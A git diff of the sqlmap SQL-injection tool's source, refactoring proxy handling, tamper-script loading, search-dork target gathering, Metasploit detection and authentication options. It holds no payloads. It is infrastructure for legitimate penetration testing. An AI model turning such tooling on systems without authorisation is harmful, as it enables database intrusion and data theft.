- HOSTNAME = 5 - IS_DBA = 6 - USERS = 7 - PASSWORDS = 8 - PRIVILEGES = 9 - ROLES = 10 - DBS = 11 - TABLES = 12 - COLUMNS = 13 - SCHEMA = 14 - COUNT = 15 - DUMP_TABLE = 16 - SEARCH = 17 - SQL_QUERY = 18 - COMMON_TABLES = 19 - COMMON_COLUMNS = 20 - FILE_READ = 21 - FILE_WRITE = 22 - OS_CMD = 23 - REG_READ = 24 + TARGET = 0 + TECHNIQUES = 1 + DBMS_FINGERPRINT = 2 + BANNER = 3 + CURRENT_USER = 4 + CURRENT_DB = 5 + HOSTNAME = 6 + IS_DBA = 7 + USERS = 8 + PASSWORDS = 9 + PRIVILEGES = 10 + ROLES = 11 + DBS = 12 + TABLES = 13 + COLUMNS = 14 + SCHEMA = 15 + COUNT = 16 + DUMP_TABLE = 17 + SEARCH = 18 + SQL_QUERY = 19 + COMMON_TABLES = 20 + COMMON_COLUMNS = 21 + FILE_READ = 22 + FILE_WRITE = 23 + OS_CMD = 24 + REG_READ = 25 PART_RUN_CONTENT_TYPES = { "checkDbms": CONTENT_TYPE.TECHNIQUES, @@ -345,3 +356,21 @@ class AUTOCOMPLETE_TYPE: SQL = 0 OS = 1 SQLMAP = 2 + +class NOTE: + FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" + +class MKSTEMP_PREFIX: + HASHES = "sqlmaphashes-" + CRAWLER = "sqlmapcrawler-" + IPC = "sqlmapipc-" + CONFIG = "sqlmapconfig-" + TESTING = "sqlmaptesting-" + RESULTS = "sqlmapresults-" + COOKIE_JAR = "sqlmapcookiejar-" + BIG_ARRAY = "sqlmapbigarray-" + +class TIMEOUT_STATE: + NORMAL = 0 + EXCEPTION = 1 + TIMEOUT = 2 diff --git a/lib/core/exception.py b/lib/core/exception.py index faeff7c41..ffb1ab067 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/log.py b/lib/core/log.py index 3d3328545..7f42ecbe6 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/core/option.py b/lib/core/option.py old mode 100644 new mode 100755 index 896446cd0..ebf958470 --- a/lib/core/option.py +++ b/lib/core/option.py @@ 
-1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import cookielib import glob import inspect @@ -27,6 +28,7 @@ import lib.core.common import lib.core.threads import lib.core.convert import lib.request.connect +import lib.utils.search from lib.controller.checks import checkConnection from lib.core.common import Backend @@ -34,14 +36,15 @@ from lib.core.common import boldifyMessage from lib.core.common import checkFile from lib.core.common import dataToStdout from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString from lib.core.common import extractRegexResult from lib.core.common import filterStringValue +from lib.core.common import findLocalPort from lib.core.common import findPageForms from lib.core.common import getConsoleWidth from lib.core.common import getFileItems from lib.core.common import getFileType from lib.core.common import getUnicode -from lib.core.common import isListLike from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile @@ -54,12 +57,11 @@ from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import runningAsAdmin from lib.core.common import safeExpandUser +from lib.core.common import saveConfig from lib.core.common import setOptimize from lib.core.common import setPaths from lib.core.common import singleTimeWarnMessage -from lib.core.common import UnicodeRawConfigParser from lib.core.common import urldecode -from lib.core.convert import base64unpickle from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -90,6 +92,7 @@ from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges +from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException @@ -105,7 +108,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DBMS_ALIASES from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_TOR_HTTP_PORTS -from lib.core.settings import DEFAULT_TOR_SOCKS_PORT +from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS from lib.core.settings import DUMMY_URL from lib.core.settings import INJECT_HERE_MARK from lib.core.settings import IS_WIN @@ -116,18 +119,22 @@ from lib.core.settings import MAX_CONNECT_RETRIES from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX +from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import SITE +from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_OS from lib.core.settings import TIME_DELAY_CANDIDATES +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from 
lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import VERSION_STRING from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData +from lib.core.threads import setDaemon from lib.core.update import update from lib.parse.configfile import configFileParser from lib.parse.payloads import loadBoundaries @@ -142,12 +149,13 @@ from lib.request.pkihandler import HTTPSPKIAuthHandler from lib.request.rangehandler import HTTPRangeHandler from lib.request.redirecthandler import SmartRedirectHandler from lib.request.templates import getPageTemplate +from lib.utils.har import HTTPCollectorFactory from lib.utils.crawler import crawl from lib.utils.deps import checkDependencies -from lib.utils.google import Google +from lib.utils.search import search from lib.utils.purge import purge -from thirdparty.colorama.initialise import init as coloramainit from thirdparty.keepalive import keepalive +from thirdparty.multipart import multipartpost from thirdparty.oset.pyoset import oset from thirdparty.socks import socks from xml.etree.ElementTree import ElementTree @@ -158,42 +166,13 @@ keepAliveHandler = keepalive.HTTPHandler() proxyHandler = urllib2.ProxyHandler() redirectHandler = SmartRedirectHandler() rangeHandler = HTTPRangeHandler() +multipartPostHandler = multipartpost.MultipartPostHandler() -def _urllib2Opener(): - """ - This function creates the urllib2 OpenerDirector. - """ - - debugMsg = "creating HTTP requests opener object" - logger.debug(debugMsg) - - handlers = [proxyHandler, authHandler, redirectHandler, rangeHandler, httpsHandler] - - if not conf.dropSetCookie: - if not conf.loadCookies: - conf.cj = cookielib.CookieJar() - else: - conf.cj = cookielib.MozillaCookieJar() - resetCookieJar(conf.cj) - - handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - - if conf.proxy: - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - elif conf.authType: - warnMsg += "with authentication methods" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - opener = urllib2.build_opener(*handlers) - urllib2.install_opener(opener) +# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html +try: + WindowsError +except NameError: + WindowsError = None def _feedTargetsDict(reqFile, addedTargetUrls): """ @@ -238,7 +217,10 @@ def _feedTargetsDict(reqFile, addedTargetUrls): reqResList = [] for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): port, request = match.groups() - request = request.decode("base64") + try: + request = request.decode("base64") + except binascii.Error: + continue _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) if _: host = _.group(0).strip() @@ -259,6 +241,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls): if schemePort: scheme = schemePort.group(1) port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) else: scheme, port = None, None @@ -311,8 +294,9 @@ def _feedTargetsDict(reqFile, addedTargetUrls): params = True # Headers - elif re.search(r"\A\S+: ", line): - key, value = line.split(": ", 1) + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") # Cookie and Host headers if key.upper() == HTTP_HEADER.COOKIE.upper(): 
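The relaxed header check in the _feedTargetsDict() hunk above accepts "Key:value" lines without a space after the colon and strips stray CR/LF characters from the value. A minimal sketch of that parsing step in isolation (the helper name is hypothetical, not sqlmap's actual function):

    import re

    def parse_header_line(line):
        # tolerate a missing space after ':' and trailing CR/LF, as in the hunk above
        if not re.search(r"\A\S+:", line):
            return None
        key, value = line.split(":", 1)
        return key, value.strip().replace("\r", "").replace("\n", "")

    print(parse_header_line("Host:www.target.com\r\n"))    # ('Host', 'www.target.com')
    print(parse_header_line("User-Agent: sqlmap/1.0\r\n"))  # ('User-Agent', 'sqlmap/1.0')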
@@ -362,7 +346,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls): if not(conf.scope and not re.search(conf.scope, url, re.I)): if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, data, cookie, tuple(headers))) + kb.targets.add((url, conf.method or method, data, cookie, tuple(headers))) addedTargetUrls.add(url) checkFile(reqFile) @@ -371,7 +355,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls): content = f.read() except (IOError, OSError, MemoryError), ex: errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex) + errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) raise SqlmapSystemException(errMsg) if conf.scope: @@ -415,8 +399,8 @@ def _loadQueries(): try: tree.parse(paths.QUERIES_XML) except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg @@ -501,14 +485,14 @@ def _setRequestFromFile(): conf.requestFile = safeExpandUser(conf.requestFile) - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) - if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " + errMsg = "specified HTTP request file '%s' " % conf.requestFile errMsg += "does not exist" raise SqlmapFilePathException(errMsg) + infoMsg = "parsing HTTP request from '%s'" % conf.requestFile + logger.info(infoMsg) + _feedTargetsDict(conf.requestFile, addedTargetUrls) def _setCrawler(): @@ -531,49 +515,26 @@ def _setCrawler(): status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) except Exception, ex: - errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, ex) + errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) -def _setGoogleDorking(): +def _doSearch(): """ - This function checks if the way to request testable hosts is through - Google dorking then requests to Google the search parameter, parses - the results and save the testable hosts into the knowledge base. + This function performs search dorking, parses results + and saves the testable hosts into the knowledge base. 
""" if not conf.googleDork: return - global keepAliveHandler - global proxyHandler - - debugMsg = "initializing Google dorking requests" - logger.debug(debugMsg) - - infoMsg = "first request to Google to get the session cookie" - logger.info(infoMsg) - - handlers = [proxyHandler] - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - if conf.proxy: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - googleObj = Google(handlers) kb.data.onlyGETs = None def retrieve(): - links = googleObj.search(conf.googleDork) + links = search(conf.googleDork) if not links: errMsg = "unable to find results for your " - errMsg += "Google dork expression" + errMsg += "search dork expression" raise SqlmapGenericException(errMsg) for link in links: @@ -583,8 +544,7 @@ def _setGoogleDorking(): elif re.search(URI_INJECTABLE_REGEX, link, re.I): if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: message = "do you want to scan only results containing GET parameters? [Y/n] " - test = readInput(message, default="Y") - kb.data.onlyGETs = test.lower() != 'n' + kb.data.onlyGETs = readInput(message, default='Y', boolean=True) if not kb.data.onlyGETs or conf.googleDork: kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) @@ -595,7 +555,7 @@ def _setGoogleDorking(): if kb.targets: infoMsg = "sqlmap got %d results for your " % len(links) - infoMsg += "Google dork expression, " + infoMsg += "search dork expression, " if len(links) == len(kb.targets): infoMsg += "all " @@ -608,12 +568,11 @@ def _setGoogleDorking(): else: message = "sqlmap got %d results " % len(links) - message += "for your Google dork expression, but none of them " + message += "for your search dork expression, but none of them " message += "have GET parameters to test for SQL injection. " message += "Do you want to skip to the next result page? 
[Y/n]" - test = readInput(message, default="Y") - if test[0] in ("n", "N"): + if not readInput(message, default='Y', boolean=True): raise SqlmapSilentQuitException else: conf.googlePage += 1 @@ -636,7 +595,7 @@ def _setBulkMultipleTargets(): for line in getFileItems(conf.bulkFile): if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line: found = True - kb.targets.add((line.strip(), None, None, None, None)) + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) if not found and not conf.forms and not conf.crawlDepth: warnMsg = "no usable links found (with GET parameters)" @@ -670,7 +629,7 @@ def _findPageForms(): logger.info(infoMsg) if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)): - page, _ = Request.queryPage(content=True) + page, _, _ = Request.queryPage(content=True) findPageForms(page, conf.url, True, True) else: if conf.bulkFile: @@ -692,7 +651,7 @@ def _findPageForms(): except KeyboardInterrupt: break except Exception, ex: - errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, ex) + errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) def _setDBMSAuthentication(): @@ -774,6 +733,7 @@ def _setMetasploit(): kb.oldMsf = True else: msfEnvPathExists = False + conf.msfPath = path break @@ -804,7 +764,7 @@ def _setMetasploit(): for envPath in envPaths: envPath = envPath.replace(";", "") - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")): + if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): kb.oldMsf = False @@ -931,32 +891,37 @@ def _setTamperingFunctions(): resolve_priorities = False priorities = [] - for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): found = False - tfile = tfile.strip() + path = paths.SQLMAP_TAMPER_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING) + script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING) - if not tfile: - continue + try: + if not script: + continue - elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): - tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) + elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)): + script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script) - elif not os.path.exists(tfile): - errMsg = "tamper script '%s' does not exist" % tfile - raise SqlmapFilePathException(errMsg) + elif not os.path.exists(script): + errMsg = "tamper script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) - elif not tfile.endswith('.py'): - errMsg = "tamper script '%s' should have an extension '.py'" % tfile + elif not script.endswith(".py"): + errMsg = "tamper script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--tamper'" raise SqlmapSyntaxException(errMsg) - dirname, filename = os.path.split(tfile) + dirname, filename = os.path.split(script) dirname = os.path.abspath(dirname) infoMsg = "loading tamper script '%s'" % filename[:-3] logger.info(infoMsg) - if not 
os.path.exists(os.path.join(dirname, '__init__.py')): + if not os.path.exists(os.path.join(dirname, "__init__.py")): errMsg = "make sure that there is an empty file '__init__.py' " errMsg += "inside of tamper scripts directory '%s'" % dirname raise SqlmapGenericException(errMsg) @@ -965,11 +930,11 @@ def _setTamperingFunctions(): sys.path.insert(0, dirname) try: - module = __import__(filename[:-3]) - except (ImportError, SyntaxError), msg: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg)) + module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) + except (ImportError, SyntaxError), ex: + raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) - priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ + priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ for name, function in inspect.getmembers(module, inspect.isfunction): if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": @@ -978,17 +943,17 @@ def _setTamperingFunctions(): function.func_name = module.__name__ if check_priority and priority > last_priority: - message = "it seems that you might have mixed " + message = "it appears that you might have mixed " message += "the order of tamper scripts. " message += "Do you want to auto resolve this? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - resolve_priorities = True - elif test[0] in ("n", "N"): + if choice == 'N': resolve_priorities = False - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException + else: + resolve_priorities = True check_priority = False @@ -1001,7 +966,7 @@ def _setTamperingFunctions(): if not found: errMsg = "missing function 'tamper(payload, **kwargs)' " - errMsg += "in tamper script '%s'" % tfile + errMsg += "in tamper script '%s'" % script raise SqlmapGenericException(errMsg) if kb.tamperFunctions and len(kb.tamperFunctions) > 3: @@ -1018,7 +983,7 @@ def _setTamperingFunctions(): def _setWafFunctions(): """ - Loads WAF/IDS/IPS detecting functions from script(s) + Loads WAF/IPS/IDS detecting functions from script(s) """ if conf.identifyWaf: @@ -1038,7 +1003,7 @@ def _setWafFunctions(): try: if filename[:-3] in sys.modules: del sys.modules[filename[:-3]] - module = __import__(filename[:-3]) + module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) except ImportError, msg: raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) @@ -1050,6 +1015,8 @@ def _setWafFunctions(): else: kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3]))) + kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower()) + def _setThreads(): if not isinstance(conf.threads, int) or conf.threads <= 0: conf.threads = 1 @@ -1060,18 +1027,74 @@ def _setDNSCache(): """ def _getaddrinfo(*args, **kwargs): - if args in kb.cache: - return kb.cache[args] + if args in kb.cache.addrinfo: + return kb.cache.addrinfo[args] else: - kb.cache[args] = socket._getaddrinfo(*args, **kwargs) - return kb.cache[args] + kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs) + return kb.cache.addrinfo[args] - if not hasattr(socket, '_getaddrinfo'): + if not hasattr(socket, "_getaddrinfo"): socket._getaddrinfo = 
socket.getaddrinfo socket.getaddrinfo = _getaddrinfo -def _setHTTPProxy(): +def _setSocketPreConnect(): + """ + Makes a pre-connect version of socket.connect + """ + + if conf.disablePrecon: + return + + def _(): + while kb.get("threadContinue") and not conf.get("disablePrecon"): + try: + for key in socket._ready: + if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE: + family, type, proto, address = key + s = socket.socket(family, type, proto) + s._connect(address) + with kb.locks.socket: + socket._ready[key].append((s._sock, time.time())) + except KeyboardInterrupt: + break + except: + pass + finally: + time.sleep(0.01) + + def connect(self, address): + found = False + + key = (self.family, self.type, self.proto, address) + with kb.locks.socket: + if key not in socket._ready: + socket._ready[key] = [] + while len(socket._ready[key]) > 0: + candidate, created = socket._ready[key].pop(0) + if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT: + self._sock = candidate + found = True + break + else: + try: + candidate.close() + except socket.error: + pass + + if not found: + self._connect(address) + + if not hasattr(socket.socket, "_connect"): + socket._ready = {} + socket.socket._connect = socket.socket.connect + socket.socket.connect = connect + + thread = threading.Thread(target=_) + setDaemon(thread) + thread.start() + +def _setHTTPHandlers(): """ Check and set the HTTP/SOCKS proxy for all HTTP requests. """ @@ -1081,80 +1104,114 @@ def _setHTTPProxy(): if hasattr(proxyHandler, "%s_open" % _): delattr(proxyHandler, "%s_open" % _) - if not conf.proxy: - if conf.proxyList: - conf.proxy = conf.proxyList[0] - conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] + if conf.proxyList is not None: + if not conf.proxyList: + errMsg = "list of usable proxies is exhausted" + raise SqlmapNoneDataException(errMsg) - infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy - logger.info(infoMsg) - else: - if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy: - proxyHandler.proxies = {} + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] - return + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) - debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" - logger.debug(debugMsg) + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} - try: - _ = urlparse.urlsplit(conf.proxy) - except Exception, ex: - errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, ex) - raise SqlmapSyntaxException, errMsg + if conf.proxy: + debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" + logger.debug(debugMsg) - hostnamePort = _.netloc.split(":") - - scheme = _.scheme.upper() - hostname = hostnamePort[0] - port = None - username = None - password = None - - if len(hostnamePort) == 2: try: - port = int(hostnamePort[1]) - except: - pass # drops into the next check block + _ = urlparse.urlsplit(conf.proxy) + except Exception, ex: + errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) + raise SqlmapSyntaxException, errMsg - if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): - errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) - raise SqlmapSyntaxException(errMsg) + hostnamePort = _.netloc.split(":") - if conf.proxyCred: - _ = re.search("^(.*?):(.*?)$", conf.proxyCred) - if not _: - errMsg = "Proxy 
authentication credentials " - errMsg += "value must be in format username:password" + scheme = _.scheme.upper() + hostname = hostnamePort[0] + port = None + username = None + password = None + + if len(hostnamePort) == 2: + try: + port = int(hostnamePort[1]) + except: + pass # drops into the next check block + + if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): + errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) raise SqlmapSyntaxException(errMsg) - else: - username = _.group(1) - password = _.group(2) - - if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): - proxyHandler.proxies = {} - - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) - socks.wrapmodule(urllib2) - else: - socks.unwrapmodule(urllib2) if conf.proxyCred: - # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection - proxyString = "%s@" % conf.proxyCred + _ = re.search("^(.*?):(.*?)$", conf.proxyCred) + if not _: + errMsg = "proxy authentication credentials " + errMsg += "value must be in format username:password" + raise SqlmapSyntaxException(errMsg) + else: + username = _.group(1) + password = _.group(2) + + if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): + proxyHandler.proxies = {} + + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) + socks.wrapmodule(urllib2) else: - proxyString = "" + socks.unwrapmodule(urllib2) - proxyString += "%s:%d" % (hostname, port) - proxyHandler.proxies = {"http": proxyString, "https": proxyString} + if conf.proxyCred: + # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection + proxyString = "%s@" % conf.proxyCred + else: + proxyString = "" - proxyHandler.__init__(proxyHandler.proxies) + proxyString += "%s:%d" % (hostname, port) + proxyHandler.proxies = {"http": proxyString, "https": proxyString} + + proxyHandler.__init__(proxyHandler.proxies) + + debugMsg = "creating HTTP requests opener object" + logger.debug(debugMsg) + + handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler]) + + if not conf.dropSetCookie: + if not conf.loadCookies: + conf.cj = cookielib.CookieJar() + else: + conf.cj = cookielib.MozillaCookieJar() + resetCookieJar(conf.cj) + + handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) + + # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html + if conf.keepAlive: + warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " + warnMsg += "been disabled because of its incompatibility " + + if conf.proxy: + warnMsg += "with HTTP(s) proxy" + logger.warn(warnMsg) + elif conf.authType: + warnMsg += "with authentication methods" + logger.warn(warnMsg) + else: + handlers.append(keepAliveHandler) + + opener = urllib2.build_opener(*handlers) + urllib2.install_opener(opener) def _setSafeVisit(): """ Check and set the safe visit options. 
""" - if not any ((conf.safeUrl, conf.safeReqFile)): + if not any((conf.safeUrl, conf.safeReqFile)): return if conf.safeReqFile: @@ -1255,13 +1312,13 @@ def _setHTTPAuthentication(): global authHandler - if not conf.authType and not conf.authCred and not conf.authPrivate: + if not conf.authType and not conf.authCred and not conf.authFile: return - if conf.authPrivate and not conf.authType: + if conf.authFile and not conf.authType: conf.authType = AUTH_TYPE.PKI - elif conf.authType and not conf.authCred and not conf.authPrivate: + elif conf.authType and not conf.authCred and not conf.authFile: errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise SqlmapSyntaxException(errMsg) @@ -1276,21 +1333,21 @@ def _setHTTPAuthentication(): errMsg += "Basic, Digest, NTLM or PKI" raise SqlmapSyntaxException(errMsg) - if not conf.authPrivate: + if not conf.authFile: debugMsg = "setting the HTTP authentication type and credentials" logger.debug(debugMsg) - aTypeLower = conf.authType.lower() + authType = conf.authType.lower() - if aTypeLower in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): + if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication credentials " % aTypeLower + errMsg = "HTTP %s authentication credentials " % authType errMsg += "value must be in format 'username:password'" - elif aTypeLower == AUTH_TYPE.NTLM: + elif authType == AUTH_TYPE.NTLM: regExp = "^(.*\\\\.*):(.*?)$" errMsg = "HTTP NTLM authentication credentials value must " errMsg += "be in format 'DOMAIN\username:password'" - elif aTypeLower == AUTH_TYPE.PKI: + elif authType == AUTH_TYPE.PKI: errMsg = "HTTP PKI authentication require " errMsg += "usage of option `--auth-pki`" raise SqlmapSyntaxException(errMsg) @@ -1307,13 +1364,13 @@ def _setHTTPAuthentication(): _setAuthCred() - if aTypeLower == AUTH_TYPE.BASIC: + if authType == AUTH_TYPE.BASIC: authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) - elif aTypeLower == AUTH_TYPE.DIGEST: + elif authType == AUTH_TYPE.DIGEST: authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr) - elif aTypeLower == AUTH_TYPE.NTLM: + elif authType == AUTH_TYPE.NTLM: try: from ntlm import HTTPNtlmAuthHandler except ImportError: @@ -1327,7 +1384,7 @@ def _setHTTPAuthentication(): debugMsg = "setting the HTTP(s) authentication PEM private key" logger.debug(debugMsg) - _ = safeExpandUser(conf.authPrivate) + _ = safeExpandUser(conf.authFile) checkFile(_) authHandler = HTTPSPKIAuthHandler(_) @@ -1351,17 +1408,13 @@ def _setHTTPExtraHeaders(): errMsg = "invalid header value: %s. 
